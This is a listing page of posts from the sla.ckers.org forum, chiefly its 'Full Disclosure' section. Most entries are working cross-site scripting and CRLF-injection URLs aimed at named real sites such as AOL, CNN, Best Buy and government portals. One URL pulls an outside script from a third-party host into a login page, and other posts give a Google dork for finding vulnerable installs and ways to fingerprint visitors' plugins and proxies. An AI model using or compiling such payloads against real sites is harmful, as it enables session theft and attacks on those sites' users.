Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Who's got it? Who's giving it away? How to protect your privacy and steal it from other people. For intellectual privacy, personal privacy, and blackhats alike... 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 53
6 years ago
unsticky
http://h-date.com/login.jsp?login=%22%3E%3Cscript%20src=%22http://bryanlies.com/x.js%22%3E%3C/script%3E&password=&Submit=Login ^ dont ask... http://photobucket.com/mediadetail/?media=http://pic.photobucket.com/../logos/';alert(document.cookie);%3C/script%3E/PBLogo.166.BG.white.gif&searchTerm=&pageOffset=1 http://photobucket.com/mediadetail/?media=http://pic.photobucket.com/../
Forum: Full Disclosure
6 years ago
unsticky
finally a sick thread to get my interest in the ol' haxin' game back up. too bad i've been out of this shit for too long, or i'd post somethin' up, myself.
Forum: XSS Info
7 years ago
unsticky
While I was experimenting with some of the javascript variables, I stumbled upon ways to detect a few FireFox plugins, as long as they're enabled. Though, I'm not entirely sure what good this is, I thought I'd throw my two cents in, since rsnake's posted on this sort of thing atleast a few times. IE Tab: IE Tab acts not only as an extension, but also a plugin, so it shows up under navigator.pl
Forum: Privacy
7 years ago
unsticky
http://wwwl.meebo.com/redirect.php?%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie);%3C/script%3E
Forum: Full Disclosure
7 years ago
unsticky
http://x.go.com/cgi/x.pl?goto=http://%0d%0a%0d%0a%3Cscript%3Ealert('xss');%3C/script%3E
Forum: Full Disclosure
7 years ago
unsticky
Not the first time. Last time they ignored me it was for a Windows XP Home bug...
Forum: Full Disclosure
7 years ago
unsticky
Because Securiteam, Secunia, and SecurityTracker have all chosen to ignore me, I'll just be releasing my find here. Software: Enthusiast 3 Description: Enthusiast 3 (Enth3) is a full-featured, linkware multiple listing management system. Vendor URL: http://scripts.indisguise.org/ Versions: 3[.?] Google Dork: "Powered by Enthusiast 3" inurl:"?cat=" Example URL: http://
Forum: Full Disclosure
7 years ago
unsticky
http://www.zippyvideos.com/video_search.z?q=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E&x=0&y=0
Forum: Full Disclosure
7 years ago
unsticky
idk if this one's been posted yet or not, probably has... but im just trying to stay away from aol :X http://www.tmz.com/search/?q=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E http://www.bloglines.com/login?r=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
Forum: Full Disclosure
7 years ago
unsticky
http://television.aol.com/?zip=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://television.aol.com/?zip=';alert(/xss/);//
Forum: Full Disclosure
7 years ago
unsticky
http://yellowpages.aol.com/main.adp?_dirph1=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirph2=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirph3=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirpid=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirquery=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dircat=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_diraddress=%22%3E%3
Forum: Full Disclosure
7 years ago
unsticky
http://aolmobile.aol.com/portal/regWidget.jsp?popup=%22%3C/script%3E%3Cscript%3Ealert('xss');%3C/script%3E More on aol.
Forum: Full Disclosure
7 years ago
unsticky
http://www.tagdeaf.com/browse.php?update=ok&sub_section=&job=&smoke=&drink=&religion=&sex=&dating=&body_type=&gender=&location=&display=&afrom=&ato=&stringType=user&string=%22%3E%3Cimg%20src=a%20onerror=alert(/xss/);%3E
Forum: Full Disclosure
7 years ago
unsticky
neolodge.com havent posted in a while, though I hate for my most recent post to relate to neopets :X
Forum: Full Disclosure
7 years ago
unsticky
http://marcopolosearch.org/MPSearch/Alt_Results.asp?orgn_id=5&hdnPerPage=15&hdnFilter=&txtSearchFor='%3E%3Cscript%3Ealert('xss');%3C/script%3E&selUsing=all&session_id=20061222922103373016 http://www.communities.gov.uk/search/error.asp?start=0&perpage=10&col=ODPM&summary=yes&sort=rank&date1=&date2=&category=&doctype=&type=boolean&search=%
Forum: Full Disclosure
7 years ago
unsticky
the google one won't work, its escaped. look at the source <html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"></head><script>D=(top.js&&top.js.init)?function(d){top.js.P(window,d)}:function(){};if(window==top){top.location="/mail/?ik\u003d%22%3E%3CBODY%20ONLOAD\u003dalert(\'XSS\')%3E&fs\u003d1";}
Forum: Full Disclosure
7 years ago
unsticky
http://www.ip2phrase.com/ip2phrase.asp?template=%3Cscript%3Ealert('xss');%3C/script%3E
Forum: Full Disclosure
7 years ago
unsticky
Edit: Nevermind, my idea didn't work as I thought it did.
Forum: Full Disclosure
7 years ago
unsticky
cdfdata.fire.ca.gov http://www.nsf.gov/publications/pub_summ.jsp?ods_key=%3Cscript%3Ealert('xss');%3C/script%3E http://factfinder.census.gov/servlet/AFFAdvSearchGoogleServlet?_lang=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_sse=on https://egov.immigration.gov/cris/jsps/termsconditions.jsp?contextType=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.aoa.gov/search/search.asp?q=%22
Forum: Full Disclosure
7 years ago
unsticky
Since noone has taken the time to do this yet, that I know of atleast, I spidered the thread and pulled all the xss vulns and jammed them into a list. I didn't sort it or any such thing, so I'll leave that upto whoever wants to actually do it. :/ The list isn't quite perfect, though, because of rsnake's url bbcode cutting off apostrophes and parenthesis, I ddint bother to add them back in, since I
Forum: Full Disclosure
7 years ago
unsticky
http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=&source=cnn&url=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://query.nytimes.com/search/query?frow=0&n=10&srcht=s&query=%27%3Balert%28%27xss%27%29%3Ba%3D%27&srchst=nyt&submit.x=0&submit.y=0&submit=sub&hdlquery=&bylquery=&daterange=full&mon1=01&day1=01&year1=
Forum: Full Disclosure
7 years ago
unsticky
random thought, instead of putting your 'zomg nubs tried to hax us for our grandma porn' logs at ha.ckers.org/logs or whatever, why not put them on tra.ckers.org and carry on the word creation-subdomain theme?! great idea brought on by two days of no sleep... mmhmmmm.
Forum: OMG Ponies
7 years ago
unsticky
https://www.aa.com/apps/redirect/AACruises.jhtml?path=%0D%0A%0A%0D%3Cscript%3Ealert('xss');%3C/script%3Ehttp:// http://dodgeit.com/run/checkmail?mailbox=%3Cimg%20src=a%20onerror=alert('xss')%3E
Forum: Full Disclosure
7 years ago
unsticky
I didn't really know where this belonged, but meh. If it needs to be somewhere else, please move it... Can't have your great-grandma porn in with your grandma porn, ya' know? Kay, anyways, I've found that you can detect if a visitor is using PHProxy pretty reliably. I was playing around with a copy of it, making some changes, and I checked what sort of headers it was sending out, using my version
Forum: Full Disclosure
7 years ago
unsticky
Yeah, I know I posted a few of them before, but I put them all into one list, and didn't really feel like going through page after page on the forum to find my post and then compare and remove the old ones. :/ And as Maluc said, most do seem to stem from the same reused, insecure, code to handle the icid and aolp GET variables. I probably missed a bunch of vulns simply because I got fed up with c
Forum: Full Disclosure
7 years ago
unsticky
I appologise for both the length of my post, and any entries that were already posted by either myself or others. What I do not appologise for is AOL's insecurity. Note: No GoogleDorks or vulnerbility scanners were used to find these. All 113 were found by me by hand. Also, all of these worked as of yesterday, Saturday November 18th, 2006. https://account.login.aol.com/opr/_cqr/opr/opr.psp?l
Forum: Full Disclosure
7 years ago
unsticky
http://www.bestbuy.com/site/olspage.jsp?id=%22;alert('xss');//&type=category&categoryRep=cat01000 http://www.gnc.com/search/noResults.jsp?kw=%3Cscript%3Ealert('xss')%3C%2Fscript%3E http://www.staples.com/webapp/wcs/stores/servlet/StaplesZipCodeAdd?ts=1163744783681&url=StaplesSearch?ts=1163744783672&keyword=%22%3E%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E&errorUrl=
Forum: Full Disclosure
7 years ago
unsticky
http://blog.chinainfo.gov.cn/blog/index.jsp?UserID=%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E Ever wonder if the Chinese government supported hacking? http://bjcert.bnii.gov.cn/2j/mj/mj.jsp?unid=20385 Hacking with Google http://bjcert.beijingit.gov.cn/2j/zxyj/mj.jsp?unid=27007 Limbo CMS? While I was going through a few more sites I found an SQL inject on a subdomain off of chinainf
Forum: Full Disclosure
7 years ago
unsticky
maluc Wrote: ------------------------------------------------------- > well the first (maybe not only) problem is that > their already is an onload event. > > You can't inject and overwrite any existing > onload events sadly :/ > > -maluc Sorry it took so long for me to actually respond, but I saw what you guys were saying, and instead of using a body tag with a
Forum: Full Disclosure
7 years ago
unsticky
Pages: 12Next
Current Page: 1 of 2